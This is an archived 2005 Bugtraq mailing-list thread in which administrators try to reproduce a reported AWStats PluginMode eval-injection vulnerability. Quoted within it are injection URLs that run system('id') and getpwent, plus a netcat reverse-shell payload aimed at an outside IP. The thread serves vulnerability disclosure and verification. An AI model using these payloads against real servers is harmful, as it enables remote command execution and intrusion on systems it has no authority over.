Bugtraq mailing list archives
RE: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3?
From: "William Pratt" <wpratt () megapath net>
Date: Tue, 15 Feb 2005 12:53:00 -0800
Same thing here on both 6.3 and 6.4. I am unable to reproduce this. Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1. Setup ('/usr/local/apache/root/billpratt_net/cgi-bin/awstats/awstats.conf' file, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory). William Pratt Sr. Engineering Application Developer Megapath Networks, Inc. Http://www.MegaPath.net I wish there was a knob on the TV to turn up the intelligence. There's a knob called "brightness", but it doesn't seem to work. -- Gallagher -----Original Message----- From: Jamie Pratt [mailto:jpratt () norwich edu] Sent: Tuesday, February 15, 2005 11:26 AM To: Ondra Holecek Cc: bugtraq () securityfocus com Subject: Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? So what are the conditions of this bug/vuln? I can't reproduce this on several 6.3 installs..: awstats 6.3 from source: request: http://www.site.org/awstats/cgi-bin/awstats.pl?&PluginMode=:print+system('id')+; output: **************** Error: Can't locate object method "BuildFullHTMLOutput_print" via package "systemid" (perhaps you forgot to load "systemid"?) at (eval 1) line 1. Setup ('/etc/awstats/awstats.www.site.org.conf' file, web server or permissions) may be wrong. Check config file, permissions and AWStats documentation (in 'docs' directory). *************** regards, jamie Ondra Holecek wrote:
GHC () www securityfocus com wrote: | | /*==========================================*/ | // GHC -> AWStats <- ADVISORY | \\ PRODUCT: AWStats | // VERSION: <= 6.3 | \\ URL: http://awstats.sourceforge.net/ | // VULNERABILITY CLASS: Multiple vulnerabilities | \\ RISK: high | /*==========================================*/ [...] | | PluginMode=:print+getpwent | | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'. | This will satisfy eval() requirements., and :print getpwent() is executed. | | http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent | | Sanitazing limits user's input, but there is no filtration for call sympols '()'. no, user is not limited, he can execute ANY command if he add ; at the end of the command, try this awstats.pl?&PluginMode=:print+system('id')+; or even this awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+; Ondra
-- James Pratt Unix Systems Administrator Norwich University http://www.norwich.edu/it <jpratt () norwich edu> | ph. (802)485-2532
Current thread:
- RE: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? William Pratt (Feb 15)
- <Possible follow-ups>
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? K-OTiK Security (Feb 16)
- RE: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? Michael Scheidell (Feb 17)
- Re: AWStats <= 6.4 Multiple vulnerabilities - can't reproduce in 6.3? newbug Tseng (Feb 19)